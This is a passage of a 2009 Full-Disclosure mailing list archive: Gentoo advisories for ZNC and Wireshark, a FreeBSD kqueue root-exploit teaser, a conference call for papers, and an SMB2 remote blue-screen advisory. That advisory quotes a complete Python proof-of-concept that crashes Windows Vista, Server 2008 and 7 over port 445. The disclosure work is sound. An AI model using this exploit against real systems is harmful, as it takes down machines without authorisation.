Re: [Full-disclosure] Internet Explorer 8 Crash

2009-09-13 Thread Jeremy Brown
My apologizes if this is an isolated bug, but I was getting various
crashes, one being http://i28.tinypic.com/md1bhw.jpg . For those who
couldn't reproduce the bug, sorry for wasting your time.

On Sun, Sep 13, 2009 at 12:42 AM, Kema Druma  wrote:
> Works Fine with SP3 + IE8, Just a hype,
> YOU ANTI-M$ elements :P
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] FreeBSD <= 6.1 kqueue() NULL pointer dereference

2009-09-13 Thread Przemyslaw Frasunek
Przemyslaw Frasunek pisze:
> FreeBSD <= 6.1 suffers from classical check/use race condition on SMP

There is yet another kqueue related vulnerability. It affects 6.x, up to
6.4-STABLE. FreeBSD security team was notified on 29th Aug, but there is no
response until now, so I won't publish any details.

Sucessful exploitation yields local root and allows to exit from jail. For now,
you can see demo on:

http://www.vimeo.com/6554787

-- 
* Fido: 2:480/124 ** WWW: http://www.frasunek.com ** NICHDL: PMF9-RIPE *
* Jabber ID: veng...@czuby.pl ** PGP ID: 2578FCAD ** HAM-RADIO: SQ5JIV *

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] ShmooCon 2010 CFP

2009-09-13 Thread Buherátor
You're still using an SSL cert with an MD5 fingerprint, no good...

2009/9/11 Bruce Potter :
> =
> ShmooCon VI – Call for Papers
> =
>
> February 5-7, 2010 - Wardman Park Marriott, Washington DC, USA
>
> The Shmoo Group is soliciting papers and presentations for the sixth
> annual ShmooCon.
>
> =
> About ShmooCon and The Shmoo Group
> =
>
> The Shmoo Group (TSG) is an independent think-tank of security
> professionals from around the world who donate their time and energy
> towards information security research and development.  Six years ago
> TSG had an idea.  This idea has grown into a community recognized
> security conference attended by over 1500 people.
>
> Although ShmooCon is primarily a security conference, we encourage
> innovative and interesting submissions on offbeat technology topics.
> Greatest consideration will be given to new presentations, but updates
> on existing work are also welcome. We are particularly interested in
> presentations from new faces, therefore we invite any individual who
> has not spoken at a conference before to submit a talk and make
> ShmooCon their inaugural event.
>
> =
> Conference Format
> =
>
> ShmooCon VI has 4 tracks to accommodate a variety of speaking styles
> and topics.
>
> One Track Mind - Technical Tales in Twenty Minutes or Less
> Break It! - Technology Exploitation
>
> Build It! – Creating Inventive Software & Hardware
>
> Bring It On! - Open Discussion of Technology & Security Topics
>
> +++ One Track Mind (Friday Night Only) +++
>
> In One Track Mind, presenters have 20 minutes on Friday night to give
> the entirety of ShmooCon a view into their mind.   Presenters beware:
> You need to be diligent about your use of time as ShmooCon staff
> strictly enforces the 20-minute timeline.  You will have just a few
> minutes for audience questions while we switch to the next talk.   If
> any questions can't be answered in that time, there is space set aside
> for further discussion while One Track Mind marches on.
>
> Topics for One Track Mind may include, but are not limited to:
>
> - Updates to talks given at other conferences
> - Works in Progress
> - Talks that are as much about fun as they are about technology
> - Anything that doesn't need a full hour to explain
>
> +++ Build It!, Break It!, Bring It On! (Saturday and Sunday) +++
>
> All presentations & discussions are 50 minutes in length and presented
> to attendees on either Saturday or Sunday. It is the speaker's
> responsibility to budget time for audience participation and questions
> – 50 minutes is a hard limit
>
> Presentations in the Build It! and Break It! tracks are strongly
> encouraged to include demonstrations of personally developed
> techniques, working code, and/or devices, with code and/or schematics
> being open-source and released to the public for free. We’re serious
> about this.  We want the community to get something from your
> presentation, not just 50 minutes of hot air.  So PLEASE, in your CFP
> response, indicate what you are releasing that will be of interest.
> If you can’t release code or something similar, be sure your
> techniques and methods are mind blowing.
>
> Presentations in Bring It On! are more open-ended, but presenters are
> strongly encouraged to structure their talk in a way that engages or
> enrages the audience. Gauge for yourself if being pelted by ShmooBalls
> (see below) is positive or negative feedback.  The audience is armed
> and ready to fire.
>
> =
> And Because We Just Can’t Say it Enough
> =
>
> ShmooCon presentations should be focused on topics that are of
> interest to security and technology professionals who are paying
> attention to current trends and issues.  Presentations dealing with
> new technologies such as cloud computing or large-scale virtualization
> or new takes on existing methods and techniques are of interest.
> Presentations that are rehashes of old talks, primers on known
> technologies, or vendor pitches will be rejected and summarily panned.
> We want ShmooCon to be educational and entertaining to the attendees
> and the community at large.  We expect our speakers to be a part of
> that through talks that are well thought out and well presented.
>
> If you feel you have a presentation that would be appropriate but that
> does not meet the guidelines in this CFP, feel free to submit it
> anyway but be sure to include information explaining your reasoning so
> we can better evaluate your proposal.
>
> =
> ShmooBalls
> =
>
> ShmooCon VI continues the tradition of arming attendees with
> ShmooBalls.  One of the major objectives for ShmooCon is to facilitate
> a frank and open discussion of opinions rather than just a one-way
> flow of information from the speaker to the audience. Speakers

[Full-disclosure] [ GLSA 200909-17 ] ZNC: Directory traversal

2009-09-13 Thread Tobias Heinlein
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200909-17
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: ZNC: Directory traversal
  Date: September 13, 2009
  Bugs: #278684
ID: 200909-17

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


A directory traversal was found in ZNC, allowing for overwriting of
arbitrary files.

Background
==

ZNC is an advanced IRC bouncer.

Affected packages
=

---
 Package  /  Vulnerable  /  Unaffected
---
  1  net-irc/znc   < 0.074>= 0.074

Description
===

The vendor reported a directory traversal vulnerability when processing
DCC SEND requests.

Impact
==

A remote, authenticated user could send a specially crafted DCC SEND
request to overwrite arbitrary files with the privileges of the user
running ZNC, and possibly cause the execution of arbitrary code e.g. by
uploading a malicious ZNC module.

Workaround
==

There is no known workaround at this time.

Resolution
==

All ZNC users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose =net-irc/znc-0.074

References
==

  [ 1 ] CVE-2009-2658
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2658

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200909-17.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
secur...@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.

License
===

Copyright 2009 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5



signature.asc
Description: OpenPGP digital signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [ GLSA 200909-16 ] Wireshark: Denial of Service

2009-09-13 Thread Tobias Heinlein
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200909-16
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: Wireshark: Denial of Service
  Date: September 13, 2009
  Bugs: #278564
ID: 200909-16

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


Multiple vulnerabilities have been discovered in Wireshark which allow
for Denial of Service.

Background
==

Wireshark is a versatile network protocol analyzer.

Affected packages
=

---
 Package /  Vulnerable  /   Unaffected
---
  1  net-analyzer/wireshark   < 1.2.1 >= 1.2.1

Description
===

Multiple vulnerabilities were discovered in Wireshark:

* A buffer overflow in the IPMI dissector related to an array index
  error (CVE-2009-2559).

* Multiple unspecified vulnerabilities in the Bluetooth L2CAP,
  RADIUS, and MIOP dissectors (CVE-2009-2560).

* An unspecified vulnerability in the sFlow dissector
  (CVE-2009-2561).

* An unspecified vulnerability in the AFS dissector (CVE-2009-2562).

* An unspecified vulnerability in the Infiniband dissector when
  running on unspecified platforms (CVE-2009-2563).

Impact
==

A remote attacker could exploit these vulnerabilities by sending
specially crafted packets on a network being monitored by Wireshark or
by enticing a user to read a malformed packet trace file to cause a
Denial of Service.

Workaround
==

There is no known workaround at this time.

Resolution
==

All Wireshark users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose =net-analyzer/wireshark-1.2.1

References
==

  [ 1 ] CVE-2009-2559
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2559
  [ 2 ] CVE-2009-2560
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2560
  [ 3 ] CVE-2009-2561
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2561
  [ 4 ] CVE-2009-2562
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2562
  [ 5 ] CVE-2009-2563
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2563

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200909-16.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
secur...@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.

License
===

Copyright 2009 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5



signature.asc
Description: OpenPGP digital signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

2009-09-13 Thread Randal T. Rioux
After testing my version of the exploit (using Java instead of Python) I 
tried it against a Windows Server 2008 R2 installation - it went down.

http://www.procyonlabs.com/software/smb2_bsoder

Randy


laurent gaffie wrote:
> Advisory updated :
> 
> 
> =
> - Release date: September 7th, 2009
> - Discovered by: Laurent Gaffié
> - Severity: High
> =
> 
> I. VULNERABILITY
> -
> Windows Vista, Server 2008 < R2, 7 RC :
> SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.
> 
> II. BACKGROUND
> -
> Windows vista and newer Windows comes with a new SMB version named SMB2.
> See: 
> http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#Server_Message_Block_2.0
> for more details.
> 
> III. DESCRIPTION
> -
> [Edit]Unfortunatly this SMB2 security issue is specificaly due to a MS 
> patch, for another SMB2.0 security issue:
> KB942624 (MS07-063)
> Installing only this specific update on Vista SP0 create the following 
> issue:
> 
> SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE 
> PROTOCOL REQUEST functionnality.
> The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client send to a 
> SMB server, and it's used to identify the SMB dialect that will be used 
> for futher communication.
> 
> IV. PROOF OF CONCEPT
> -
> 
> Smb-Bsod.py:
> 
> #!/usr/bin/python
> #When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field
> #it dies with a PAGE_FAULT_IN_NONPAGED_AREA error
> 
> from socket import socket
> 
> host = "IP_ADDR", 445
> buff = (
> "\x00\x00\x00\x90" # Begin SMB header: Session message
> "\xff\x53\x4d\x42" # Server Component: SMB
> "\x72\x00\x00\x00" # Negociate Protocol
> "\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
> "\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
> "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
> "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
> "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
> "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
> "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
> "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
> "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
> "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
> "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
> "\x30\x30\x32\x00"
> )
> s = socket()
> s.connect(host)
> s.send(buff)
> s.close()
> 
> V. BUSINESS IMPACT
> -
> An attacker can remotly crash any Vista/Windows 7 machine with SMB enable.
> Windows Xp, 2k, are NOT affected as they dont have this driver.
> 
> VI. SYSTEMS AFFECTED
> -
> [Edit]Windows Vista All (64b/32b|SP1/SP2 fully updated), Win Server 2008 
> < R2, Windows 7 RC.
> 
> VII. SOLUTION
> -
> No patch available for the moment.
> Close SMB feature and ports, until a patch is provided.
> Configure your firewall properly
> You can also follow the MS Workaround:
> http://www.microsoft.com/technet/security/advisory/975497.mspx
> 
> VIII. REFERENCES
> -
> http://www.microsoft.com/technet/security/advisory/975497.mspx
> http://blogs.technet.com/msrc/archive/2009/09/08/microsoft-security-advisory-975497-released.aspx
> 
> IX. CREDITS
> -
> This vulnerability has been discovered by Laurent Gaffié
> Laurent.gaffie{remove-this}(at)gmail.com 
> 
> X. REVISION HISTORY
> -
> September 7th, 2009: Initial release
> September 11th, 2009: Revision 1.0 release
> 
> XI. LEGAL NOTICES
> -
> The information contained within this advisory is supplied "as-is"
> with no warranties or guarantees of fitness of use or otherwise.
> I accept no responsibility for any damage caused by the use or
> misuse of this information.
> 
> XII.Personal Notes
> -
> Many persons have suggested to update this advisory for RCE and not BSOD:
> It wont be done, if they find a way to execute code, they will publish 
> them advisory.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/